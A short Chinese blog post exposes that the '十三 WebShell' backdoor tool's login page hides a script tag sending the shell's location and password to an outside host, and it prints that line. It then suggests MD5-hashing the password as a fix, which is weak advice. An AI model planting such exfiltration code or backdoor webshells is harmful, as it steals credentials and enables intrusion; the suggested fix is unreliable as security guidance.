使用“十三 WebShell”后门黑客的重磅炸弹

喜欢使用“十三 WebShell”的后门的黑客们注意啦
我偶尔发现这个后面程序存在着很大的漏洞,您的密码会通过登录页面泄漏给所有人。

事情是这样的，在你的“十三 WebShell”登录界面，点击右键，选择“查看源文件”，这时候奇迹出现了：在代码的最后一句是这样的：
<script src='http://8cce.com/ad/?ad=13&u=127.0.0.1:80/log.asp&p=123456'></script>

知道什么意思了么？？上文里的最后那个数字的字符串就是我们所预设的后门登录密码，不信可以试试。后门程序把黑客们挂的程序密码泄漏给所有可以找到它的人。

我不知道作者为什么要这样做，相信您看了这个文章并做了试验之后或许会大吃一惊，原来自己用这个工具享受“黑客”的乐趣的时候自己已经被“黑”了。

我的第一感想是想法给它补上这个漏洞，或者是作者留给工具使用者的后门。
预知如何解决这个漏洞，请继续关注我的日志，或者访问我的QQ空间进行解密。
在我的相册中也同样存在着加密的解决方案。
有兴趣的可以留言索取。。

我不是黑客，可是我们都关心这样一个问题，那就是计算机安全。

解决方案：
=========
我们可以使用MD5加密我们的密码，然后可以把加密后的字符串存放在后门程序页面中，然后在登录的时候加一个事件，把我们从表单中输入的密码再MD5加密一下，这样就可以成功登录，又能保证我们的密码安全。